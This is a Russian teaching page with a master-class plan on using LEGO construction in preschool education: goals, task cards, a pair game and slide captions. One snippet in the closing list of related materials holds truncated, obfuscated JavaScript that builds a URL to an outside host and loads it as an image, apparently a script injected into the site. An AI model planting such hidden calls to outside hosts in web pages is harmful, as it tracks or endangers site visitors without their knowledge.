Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»
консультация

Кочкина Мария Викторовна

В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых педагогических технологий, методик, различных видов дидактического материала.

Наиболее популярным оборудованием на сегодняшний день считаются материалы Лего, в которые входят различные виды конструкторов.

У слова Лего два значения: «я учусь» и «я складываю».

В педагогике Лего-технология интересна тем, что, строясь на интегрированных принципах, объединяет в себе элементы игры и экспериментирования.

Скачать:


Предварительный просмотр:

Мастер – класс

«Использование Лего – конструирования

в образовательной работе с дошкольниками»

Цель: создать условия для повышения профессионального мастерства педагогов в процессе активного игрового взаимодействия по освоению развивающих методов и приемов с помощью лего - конструирования.

Задачи мастер-класса:

  • Познакомить педагогов с опытом работы по использованию Лего - конструирования с детьми дошкольного возраста
  • Обучить участников мастер-класса методам и приемам использования Лего игр в педагогическом процессе
  • Развивать интерес, инициативу, желание применять на практике данные технологии
  • Вызвать желание к сотрудничеству, взаимопониманию.

     

«Конструируя, ребенок действует, как зодчий,

 возводящий здание собственного потенциала»

Жан  Пиаже

В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых педагогических технологий, методик, различных видов дидактического материала.

Наиболее популярным оборудованием на сегодняшний день считаются материалы Лего, в которые входят различные виды конструкторов.

У слова Лего два значения: «я учусь» и «я складываю».

В педагогике Лего-технология интересна тем, что, строясь на интегрированных принципах, объединяет в себе элементы игры и экспериментирования.

Давайте дадим лучшему в мире конструктору небольшую характеристику.

  • Безопасность.
  • Широкие игровые возможности.
  • Развивает воображение, творческие способности, логическое мышление.
  • Наличие большого количества разнообразных серий.
  • Универсальность (подходит для всех возрастов: для девочек и мальчиков и даже взрослых).
  • Легкий сбор и разбор конструкций.
  • Это возможность коллективной игры.

Лего-технология является ярким  примером интеграции всех образовательных областей, как в организованной образовательной деятельности, так и в самостоятельной деятельности детей,  способствуя развитию:

  • математических способностей — ребёнок отбирает, отсчитывает необходимые по размеру, цвету, конфигурации детали.
  • речевых и коммуникационных навыков — ребёнок пополняет словарь новыми словами, в процессе конструирования общается с взрослыми, задаёт конкретные вопросы о различных предметах, уточняет их свойства.
  • повышает эффективность усвоения материала детьми, имеющими особенности развития  — оказывает благотворное воздействие на развитие ребёнка в целом (развивается мелкая моторика, память, внимание, логическое и пространственное мышление, творческие способности и т. д.).
  • совместная игра с другими детьми и с взрослыми помогает ребенку стать более организованным, дисциплинированным, целеустремлённым, эмоционально стабильным и работоспособным.

Главное – Лего должно быть интересно самому воспитателю, тогда он сможет заинтересовать и детей.

Давайте представим ситуацию:

Вы начинаете проводить занятие, а тут в группу заходит ребенок с лего конструктором, естественно дети отвлеклись на это лего, что вы будете делать в данной ситуации? (ответы воспитателей)

Я хочу  сегодня рассказать вам  о некоторых вариантах применения лего- конструирования в различных образовательных областях.

 Конструктор ЛЕГО, можно использовать как инвентарь для проведения занятий по всем пяти образовательным областям.

Практическая часть.

А сейчас я предлагаю перейти к практической части и для этого я вам раздам карточки с заданиями, которые вы будете выполнять сами, после вашего выполнения проверим, как вы с ним справились.

Карточка №1 Познавательное развитие

Тема: «Урожай»

Задание №1: (в карточке изображены овощи и фрукты)

Назовите овощи и  фрукты, изображенные на карточке.

Возьми столько же деталей ЛЕГО конструктора зеленого цвета, сколько овощей.

Возьми столько же деталей ЛЕГО конструктора красного цвета, сколько фруктов.

Сравни количество деталей по цвету. Каких больше? Почему?

Карточка №2 Художественно-эстетическое развитие

Тема: «Женский день» (в карточке изображена схема постройки цветка)

Как ты называешь свою маму ласково?

Сделай цветок для мамы из ЛЕГО конструктора по образцу.

Карточка №3 Речевое развитие

Тема: «Скоро в школу» (в карточке изображены картинки:, барабан, жук, стул , ананас,)

Назови  только те картинки, в названиях которых слышится  гласный звук «А».

Выложи при помощи деталей лего конструктора, звуковую схему слова барабан, гласный звук А изобрази красным кубиком, а согласные синим.

На мой взгляд, одна из основных целей в лего - конструирования – научить детей эффективно работать вместе. Лего позволяет: создавать совместные постройки, объединенные одной идеей, одним проектом. С помощью использования этой технологии формируются: умение сотрудничать с партнером, работать в коллективе.

Следующая наша игра «Сделай по словесной инструкции» как раз направлена на отработку крепления деталей конструктора между собой, а также отражения этого в речи.

Правила игры: два участника получают одинаковые детали. Первый участник, отвернувшись, придумывает какую-то элементарную постройку и одновременно рассказывает напарнику, как он это строит. В итоге игры должны получиться две одинаковые модели. Итак, начинаем игру в парах!

Лего - игра – важнейший спутник детства, позволяющий детям учиться играя. Каждая постройка Лего – это фантастическое новое приключение, каждый раз необычное, всегда веселое, познавательное и желанное

Спасибо, уважаемые коллеги, за внимание и сотрудничество!


Предварительный просмотр:


Подписи к слайдам:

Слайд 1

Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками» Муниципальное автономное дошкольное образовательное учреждение детский сад комбинированного вида «Сказка» Воспитатель: Кочкина Мария Викторовна

Слайд 2

ВИДЫ КОНСТРУКТОРА

Слайд 3

ХАРАКТЕРИСТИКА Безопасен Широкие игровые возможности Универсален Легкий сбор и разбор к онструкций Возможность коллективной игры Развивает: воображение, творческие способности, логическое мышление

Слайд 6

LEGO игра – важнейший спутник детства, позволяющий детям учиться, играя, обучаясь в игре. Каждая постройка LEGO – это фантастическое новое приключение, каждый раз не обычное, всегда веселое, познавательное и желанное


По теме: методические разработки, презентации и конспекты

мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста,  формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....

Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"

Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...

МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...

МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками

Цель: повышение профессионального мастерства педагогов-участников мастер-классе по ЛЕГО-конструированию в процессе активного педагогического общения.Задачи:обучать участников мастер-класса навыкам при...

МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками

Добрый день, уважаемые гости. Сегодня на мастер-классе я хотела бы познакомить Лего-конструированием.   Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкнове...